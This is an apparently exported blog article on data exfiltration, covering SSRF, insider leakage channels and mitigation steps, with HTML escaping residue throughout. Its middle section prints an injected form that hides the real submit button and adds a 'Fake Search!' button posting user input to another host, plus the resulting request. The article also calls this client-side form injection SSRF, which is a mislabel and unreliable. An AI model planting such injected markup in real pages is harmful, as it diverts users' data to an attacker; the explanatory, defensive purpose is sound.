The leakage of sensitive information from a protected network to an external network could result in serious damage to the organizations in terms of reputation, loss of revenue and legal consequences, for example:<\/p>\n
- \n
- National Security<\/em><\/strong>: the steal of classified documents may endanger national security<\/em>;<\/li>\n
- Organizations<\/strong><\/em>: proprietary information can be sold to a rival company causing a loss of competitive advantage<\/em>;<\/li>\n
- Citizens<\/em><\/strong>: the spreading of personal sensitive data could have serious privacy and security implications like Identity Theft<\/em> by an ATO attack.<\/li>\n<\/ul>\n
Sensitive proprietary digital information could be contained in:<\/p>\n
- \n
- static content: <\/strong>files,\u00a0images, texts, spreadsheets, phone-books, agenda etc.;<\/li>\n
- dynamic content: <\/strong>multimedia sessions,\u00a0telephone conversations, video conferences, chatting channels (text, video image).<\/li>\n<\/ul>\n
The leakage can be done in several ways:<\/p>\n
- the data are ex-filtrated without altering the original files;
- the data are modified: converted in new file format or encrypted;
- the data are hidden using steganography techniques;
- the data are ex-filtrated using a combination of the aforementioned techniques.<\/p>\n\u00a0<\/p>\n
OUTSIDER ATTACK: CYBER-ESPIONAGE AND CYBER-SABOTAGE BY SSRF
<\/strong><\/p>\nSSRF ( Server-Side Request Forgery<\/em>) is\u00a0 an external attack which lets an attacker send crafted requests from the back-end server of a vulnerable web application. SSRF is commonly used by attackers to target internal networks that are behind firewalls and can not be reached from the external network.<\/p>\n
\u00a0<\/p>\n\n\n
![\"This](\"http:\/\/www.volucer.it\/wp-content\/uploads\/2014\/04\/SSRF.png\")
<\/figure>\n\n\n\u00a0<\/p>\n
SSRF - Server Side Request Forgery Schema<\/p>\n
\u00a0<\/p>\n
It is a web security vulnerability that allows an attacker to induce the server-side application to make HTTP requests to an arbitrary domain of the attacker's choosing. Furthermore it could:<\/p>\n
\u2714 potentially leaking sensitive data such as authorization credentials;
\u2714 might even allow an attacker to perform arbitrary command execution.<\/p>\n\u00a0<\/p>\n
AN SSRF ATTACK: ABUSED HTML FORM ATTACK MECHANISM<\/strong><\/p>\n
An attacker can export users\u2019 sensitive data using \u201cHTML form injection attack<\/em>\u201d. Here is an example of using the formaction<\/em> attribute. According to the HTML 5 specification, it can be used to overwrite the action attribute of its parent form by specifying the URL of the file that will process the input control when the from is submitted.<\/p>\n
Le us consider the following normal form in a HTML page:<\/p>\n
<form action<\/strong>=\u201dURL\u201d ... ><\/span>
list of couples (label, data-box)<\/span>
<button type=\u201dsubmit\u201d... \/> label <\/button><\/span>
<\/form><\/span><\/pre>\nWe inject a formaction<\/em> attribute:<\/p>\n
<form action=\u201dURL\u201d ... ><\/span>
list of couples (label, data-box)<\/span>
<button type=\"submit\" formaction=\"BAD URL \"> Fake Search! <\/button><\/strong><\/span>
<\/form><\/span><\/pre>\nThe injected form sends its form-data to BAD URL instead of URL.<\/p>\n
\u00a0<\/p>\n
HTML FORM ATTACK EXAMPLE<\/strong><\/p>\n
In this type of attack we use the formaction<\/em><\/strong> attribute which is fully supported by all browsers. It specifies where to send the form-data when a form is submitted by overriding the form's\u00a0 action<\/em> attribute. The following HTML code:<\/p>\n
<h1>AUTHENTICATION System<\/h1> <\/span>
<div align=\"left\"><\/span>
<form action=\"\/action.php\"<\/span><\/strong> method=\"get\"><\/span>
<label for=\"nPSW\">My Password:<\/label><\/span>
<input type=\"text\" id=\"iPSW\" name=\"nPSW\"><br><br><\/span>
<button type=\"submit\">Submit Password<\/button><\/span>
<button type=\"submit\" formaction=\"\/form_action.php\"<\/span><\/strong>>Submit Password to another page<\/button><\/span>
<\/form><\/span>
<\/div><\/span> <\/pre>\nproduces:<\/p>\n
![\"This](\"https:\/\/www.volucer.it\/wp-content\/uploads\/2022\/03\/formaction.png\")
<\/p>\n\u00a0<\/p>\n
by clicking on Submit Password<\/strong><\/em> we have:<\/p>\n
action.php?nPSW=BadPSW123456<\/pre>\n
by clicking on Submit Password to another page<\/strong><\/em> we have:<\/p>\n
form_action.php?nPSW=BadPSW123456
<\/pre>\nThe following HTML:<\/p>\n
<article><\/span>
<form name=\"fsbycode\" class=\"s4form\" action=\"http:\/\/www.spunctum.it\" method=\"post\"><\/span>
<header><\/span>
<h2>Search Guest By Numeric Code<\/h2><\/span>
<\/header><\/span>
Codice Numerico: <input type=\"number\" autocomplete=\"on\" id=\"icode\" name=\"icode\" autofocus placeholder=\"Insert Code Number\" ><\/span>
<input class=\"SButton\" type=\"submit\" value=\"Search!\"><\/span>
<\/form><\/span>
<\/article><\/span><\/pre>\nProduce this form in the web browser:<\/p>\n
\u00a0<\/p>\n
![\"Normal](\"http:\/\/www.volucer.it\/wp-content\/uploads\/2014\/04\/WebForm_Normal_Reduced.jpg\")
<\/a><\/p>\nThe attack on the web server can produce the following\u00a0 abused HTML:<\/p>\n
<article><\/span>
<form name=\"fsbycode\" class=\"s4form\" action=\"http:\/\/www.spunctum.it\" method=\"post\"><\/span>
<header><\/span>
<h2>Search Guest By Numeric Code<\/h2><\/span>
<\/header><\/span>
Codice Numerico: <input type=\"number\" autocomplete=\"on\" id=\"icode\" name=\"icode\"<\/span>
autofocus placeholder=\"Insert Code Number\" ><\/span>
<!-- BEGIN attacker's code --><\/strong><\/span>
\u00a0 \u00a0 \u00a0 <button type=\"submit\" formaction=\"http:\/\/www.volucer.it\"> <\/strong>Fake Search! <\/button><\/strong><\/span>
\u00a0 \u00a0 \u00a0 <style> .SButton {visibility:hidden;} <\/style><\/strong><\/span>
<!-- END attacker's code --><\/strong><\/span>
<input class=\"SButton\" type=\"submit\" value=\"Search!\"><\/strong><\/span>
<\/form><\/span>
<\/article>
<\/span><\/pre>\nAs we can see in the above code, the correct button used for the submission of the form is hidden by using the style applied to the class .S<\/span>Button <\/em><\/span><style> .SButton {visibility:hidden;} <\/style><\/strong>.<\/p>\n
The previous HTML shows in the browser:<\/p>\n
![\"Abused](\"http:\/\/www.volucer.it\/wp-content\/uploads\/2014\/04\/WebForm_Abused_Reduced.jpg\")
<\/a>
By clicking on Fake Search!<\/strong> button the next HTTP request is produced:<\/p>\nPOST http:\/\/www.volucer.it\/<\/strong><\/span> HTTP\/1.1
Host: www.volucer.it
Proxy-Connection: keep-alive
Content-Length: 16
Cache-Control: max-age=0
Accept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/webp,*\/*;q=0.8
Origin: null
User-Agent: Mozilla\/5.0 (Windows NT 5.1) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/34.0.1847.116 Safari\/537.36
Content-Type: application\/x-www-form-urlencoded
Accept-Encoding: gzip,deflate,sdch
Accept-Language: it-IT,it;q=0.8,en-US;q=0.6,en;q=0.4,he;q=0.2
icode=0123456789<\/pre>\nThis show how the data are sent to the illegitimate web site \"www.volucer.it\"<\/em> instead of www.spunctum.it (the web site are only used for demonstration purposes of how the attack scheme works<\/strong>)<\/em>.<\/p>\n
\u00a0<\/p>\n
INSIDER ATTACK: CYBER-ESPIONAGE AND CYBER-SABOTAGE<\/strong><\/p>\n
It is done by a trusted individual with legitimate access to its network and system resources.\u00a0 Compared to external threats, insider threats are more dangerous and difficult to detect and prevent.\u00a0\u00a0<\/p>\n
if the insider individual uses the protected network to exfiltrate sensitive information, he could use several type of communication channel:<\/p>\n
- \n
- overt communication<\/strong>: preserving privacy by using encryption;<\/li>\n
- tunnelled communication<\/strong>: over authorized overt channel;<\/li>\n
- covert communication<\/strong>: using steganography techniques to cloak the content.<\/li>\n<\/ul>\n
\u00a0<\/p>\n
\u00a0<\/p>\n
ABOUT MITIGATION<\/strong><\/p>\n
In order to face this serious problem the security system of a ICT infrastructure must be equipped with mechanisms for prevention, detection, damage limitation and monitoring.<\/p>\n
PREVENTION<\/strong><\/span>
In order to lower the risk of attacks, unauthorized communication channels should be blocked to prevent the exfiltration of data externally to the organization through compromised applications.<\/p>\nDETECTION<\/span><\/strong>
We need a system to detect when a web site is compromised to promptly react to the attack.
The use of Sensitive Information Dissemination Detection<\/em> (SIDD<\/strong>) systems is a mechanism for stopping leakage of sensitive information on time. It monitors the outbound traffic from the protected network, taking actions responsively in case of suspect traffic of packets.<\/p>\nDAMAGE LIMITATION AND RECOVERY<\/span><\/strong>
When the attack is in progress we have to limit the damages by closing any compromised channels.
After attack detection this is what must be done in order to minimize information leakage:<\/p>\n1) analyze what vulnerability has been exploited and if it is structural of the system or not;
2) harden the security of the information system to avoid another attack of the same type.<\/p>\nMONITORING<\/span><\/strong>
If the security system doesn't detect any problems, it is highly recommended to run a random deep security check because an information leakage could have been happened in a stealthy mode.<\/p>\n\u00a0<\/p>\n
REFERENCES<\/strong><\/p>\n
- \n
- Eric Y. Chen, Sergey Gorbaty, Astha Singhal and Collin Jackson: Self-Exfiltration: The Dangers of Browser-Enforced Information Flow Control, Carnegie Mellon University;<\/li>\n
- http:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/data-exfiltration-in-targeted-attacks\/;<\/li>\n
- Yali Liu, Cherita Corbett and Ken Chiang, Rennie Archibald, Biswanath Mukherjee and Dipak Ghosal, SIDD: A Framework for Detecting Sensitive Data Exfiltration by Insider Attack, University of California, Usa;<\/li>\n
- https:\/\/vladtoie.gitbook.io\/secure-coding\/server-side\/server-side-request-forgery-ssrf: Server-Side Request Forgery (SSRF);<\/li>\n<\/ol>\n\n\n
Last update on 19\/03\/2022<\/strong><\/p>\n","protected":false},"excerpt":{"rendered":"
\u00a0 \u201cData exfiltration is the unauthorized transfer of sensitive information from a target\u2019s network to a location which a threat actor controls\u201d[02].\u00a0 \u00a0For the National Security and Organizations the worst scenario is when the attackers not only steal data (cyber-espionage) but also modify them producing cyber-sabotage. The leakage of sensitive information from a protected network ...continue reading
- tunnelled communication<\/strong>: over authorized overt channel;<\/li>\n
- dynamic content: <\/strong>multimedia sessions,\u00a0telephone conversations, video conferences, chatting channels (text, video image).<\/li>\n<\/ul>\n
- Organizations<\/strong><\/em>: proprietary information can be sold to a rival company causing a loss of competitive advantage<\/em>;<\/li>\n